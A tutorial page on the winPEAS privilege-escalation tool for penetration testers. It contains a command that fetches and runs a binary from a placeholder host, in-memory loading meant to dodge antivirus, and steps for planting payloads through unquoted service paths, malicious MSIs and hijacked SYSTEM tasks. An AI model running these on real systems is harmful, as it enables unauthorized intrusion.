winPEAS


winPEAS (Windows Privilege Escalation Awesome Script) is a post-exploitation enumeration tool for Windows, designed to automate the discovery of local privilege escalation opportunities. It checks for a wide range of misconfigurations, exposed credentials, insecure services, and other system weaknesses that an attacker could leverage to elevate privileges. It only enumerates and reports; exploiting what it finds is a separate, manual step.

Like linPEAS, it is commonly used by penetration testers, ethical hackers, and red teamers during the post-exploitation phase, after gaining initial access to a Windows machine.


Quick Command Snippet

Once you’ve gained access to a Windows system, run winPEAS using the following PowerShell command:

> powershell -nop -c "Invoke-WebRequest -Uri https://yourdomain.com/tools/winpeas_x64.exe -OutFile winpeas.exe; .\winpeas.exe"

This command downloads the 64-bit winPEAS executable from a server you control (https://yourdomain.com is a placeholder) and runs it. Replace winpeas_x64.exe with winpeas_x86.exe for 32-bit systems; check [Environment]::Is64BitOperatingSystem if you are unsure which you are on. On Windows PowerShell 5.1, add -UseBasicParsing to Invoke-WebRequest if it complains about the Internet Explorer engine. Note that this writes the binary to disk, which is exactly where most antivirus engines will catch it.

Note: winPEAS is flagged as a hacktool by most antivirus products. The detection is on the binary's contents, so renaming the file alone rarely helps. If it fails to run, load it from memory instead of writing it to disk, use an obfuscated build, or fall back to the script variant (winPEAS.bat), which is slower but is plain batch.
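One way to avoid dropping the binary on disk is to load the .NET assembly straight into memory from PowerShell. This is an added example, not code from the original page; the URL is the same placeholder as above, and the entry point [winPEAS.Program]::Main is the one the PEASS-ng README shows for its release binaries, so confirm it against the build you actually use:

```powershell
# Added example: fetch winPEAS over HTTPS and load it without touching disk.
# https://yourdomain.com/tools/winpeas_x64.exe is a placeholder for your own host.
$bytes = (New-Object System.Net.WebClient).DownloadData('https://yourdomain.com/tools/winpeas_x64.exe')

# Load the assembly from the byte array. The PowerShell process bitness must
# match the build (64-bit PowerShell for the x64 binary), otherwise Load throws
# BadImageFormatException; the project's "any" build avoids that constraint.
$asm = [System.Reflection.Assembly]::Load([byte[]]$bytes)

# Entry point as documented in the PEASS-ng README. An empty string runs all
# checks; pass a check name (for example "servicesinfo") to run a single section.
[winPEAS.Program]::Main("")
```

Script-block logging and AMSI will still see the PowerShell command line and the assembly load, so this avoids file-based detection only; it is not invisible.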


Overview of winPEAS Usage

How to Use winPEAS

To run winPEAS on a target Windows system:

  1. Transfer the Tool: Use PowerShell or another method to download the correct architecture version (x86 or x64) to the compromised machine.
  2. Execute: Run the binary from a terminal or PowerShell prompt.
  3. Analyze Output: Review the results to identify potential escalation vectors. winPEAS colour-codes its output; items printed in red are the ones it considers most likely to be an escalation path, so start there.

Example Output

Here’s a sample snippet of what winPEAS might uncover:

[+] Interesting Services:
- Unquoted Service Path: C:\Program Files\Some App\service.exe
- Auto-run service with writable binary

[+] AlwaysInstallElevated is enabled:
- HKLM\Software\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated = 1
- HKCU\Software\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated = 1

[+] Insecure File Permissions:
- C:\Program Files\App\config.ini is writable

[+] Scheduled Tasks:
- \Updater\DailyCheck runs as SYSTEM
- File path is writable

How to Interpret the Results

Key Sections to Investigate:

1. Unquoted Service Paths
If a service's binary path contains spaces and is not wrapped in quotes, the service control manager tries each space-delimited prefix as an executable before the real one. For C:\Program Files\Some App\service.exe it looks for C:\Program.exe, then C:\Program Files\Some.exe, and only then the real binary.

Next Step: Check whether you can write to one of those earlier directories (C:\ or C:\Program Files\ in this example). If so, drop your payload there under the candidate name (for example Some.exe), then restart the service if you have the right to, or wait for or trigger a reboot so the service starts again and picks up your binary.

2. AlwaysInstallElevated
Exploitable only when the value is 1 under both HKLM and HKCU, as in the sample output above. With both set, Windows Installer runs any MSI with SYSTEM privileges regardless of who launched the install.

Next Step: Craft a malicious .msi and install it using msiexec /quiet /qn /i malicious.msi.

3. Insecure Permissions
winPEAS reports files or directories that the current user, or a broad group such as Everyone, Users, or Authenticated Users, can write to. A writable config file only matters if a privileged process reads it and acts on its contents; a writable binary, DLL, or directory used by a privileged service, scheduled task, or autorun is the direct case.

Next Step: Confirm the write access yourself with icacls or Get-Acl (winPEAS reports ACEs, not effective access), then modify the file to carry your payload or replace it entirely if it is loaded or executed by a privileged process.

4. Scheduled Tasks
Tasks that run as SYSTEM (or another privileged account) and whose action points at a writable file or directory can be hijacked. Check the trigger as well: a task that never fires, or runs only at logon of another specific user, may not help you.

Next Step: Replace the scheduled script or binary with your payload (keep a copy of the original), then wait for the trigger or start the task yourself with schtasks /Run /TN \Updater\DailyCheck if you have permission to run it.
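Before acting on any of the four finding types above, it is worth re-checking them by hand from the compromised user's context, since winPEAS reports what the ACLs say rather than what you can actually do. The following script is an added example and not part of winPEAS or the original page; the service path, config file, and task name are the placeholders from this page's sample output, and the write check is a heuristic (it ignores Deny ACEs), so confirm a positive result by actually creating a file:

```powershell
# Added example: manually confirm winPEAS-style findings. Placeholder targets
# (C:\Program Files\App\config.ini, \Updater\DailyCheck) are from the sample
# output on this page, not real systems.

function Test-WritableByCurrentUser {
    # True if an Allow ACE for the current user or one of its groups grants a
    # write-type right. Deny ACEs are ignored, so treat a hit as "verify this".
    param([Parameter(Mandatory)][string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return $false }
    $id   = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $sids = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })
    # Rights that let us change contents, drop files, or rewrite the ACL itself.
    $writeMask = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership'
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }
        if (($sids -contains $sid) -and (($ace.FileSystemRights -band $writeMask) -ne 0)) { return $true }
    }
    return $false
}

function Get-UnquotedServicePath {
    # For each auto-start service with an unquoted path containing spaces, list
    # every path the SCM tries before the real binary and whether we can write
    # to the directory that candidate would live in.
    Get-CimInstance Win32_Service |
        Where-Object { $_.StartMode -eq 'Auto' -and $_.PathName -and $_.PathName -notmatch '^"' } |
        ForEach-Object {
            $svc = $_
            $m   = [regex]::Match($svc.PathName, '^.*?\.exe', 'IgnoreCase')   # drop arguments
            $exe = if ($m.Success) { $m.Value } else { $svc.PathName }
            if ($exe -notmatch ' ') { return }                                # nothing to hijack
            $words = $exe -split ' '
            for ($i = 1; $i -lt $words.Count; $i++) {
                $candidate = ($words[0..($i - 1)] -join ' ') + '.exe'
                [pscustomobject]@{
                    Service     = $svc.Name
                    RealPath    = $exe
                    Candidate   = $candidate
                    DirWritable = Test-WritableByCurrentUser (Split-Path -Parent $candidate)
                }
            }
        }
}

function Test-AlwaysInstallElevated {
    # Exploitable only when BOTH the machine and the user policy value are 1.
    $keys = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
            'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    $values = foreach ($k in $keys) {
        (Get-ItemProperty -Path $k -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
    }
    return (@($values | Where-Object { $_ -eq 1 }).Count -eq 2)
}

function Get-SystemTaskWithWritableAction {
    # Enabled tasks running as SYSTEM whose executable or its directory we can
    # write. A non-admin only sees tasks it can read, so "none" is not proof.
    Get-ScheduledTask -ErrorAction SilentlyContinue |
        Where-Object { $_.State -ne 'Disabled' -and $_.Principal.UserId -match 'SYSTEM$|^S-1-5-18$' } |
        ForEach-Object {
            $task = $_
            foreach ($action in $task.Actions) {
                if (-not $action.Execute) { continue }                        # COM-handler actions
                $exe = [Environment]::ExpandEnvironmentVariables($action.Execute.Trim('"'))
                if (-not (Test-Path -LiteralPath $exe)) { continue }          # PATH-relative, skip
                [pscustomobject]@{
                    Task         = $task.TaskPath + $task.TaskName
                    Execute      = $exe
                    FileWritable = Test-WritableByCurrentUser $exe
                    DirWritable  = Test-WritableByCurrentUser (Split-Path -Parent $exe)
                }
            }
        }
}

# Run the checks against this page's placeholder findings.
Get-UnquotedServicePath | Where-Object DirWritable | Format-Table -AutoSize
"AlwaysInstallElevated exploitable: $(Test-AlwaysInstallElevated)"
"config.ini writable: $(Test-WritableByCurrentUser 'C:\Program Files\App\config.ini')"
Get-SystemTaskWithWritableAction | Where-Object { $_.FileWritable -or $_.DirWritable } | Format-Table -AutoSize
```

The unquoted-path check deliberately reports the directory of each candidate rather than the candidate file, because that is what you need to be able to create; C:\ is often writable for creating files by ordinary users on older builds but not on current ones, which is why the check is worth running per host rather than assumed.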


Download winPEAS

Download the appropriate version of winPEAS for your target system:

Note: Always download winPEAS from a trusted and official source (the PEASS-ng repository on GitHub, which publishes the release binaries) and verify what you fetched. Avoid running unverified executables on production or client systems.


Conclusion

winPEAS is a must-have tool in any Windows post-exploitation toolkit. It automates the process of hunting for privilege escalation paths and presents the results in a categorized, readable format.

Next Steps:

- Run winPEAS after gaining a foothold to look for weak spots, and run it again from any new user context you obtain, since its results depend on who you are when it runs.
- Review each identified item carefully, confirm it by hand, and determine the safest, most effective way to escalate privileges.
- Always ensure you're authorized to test the system you're analyzing.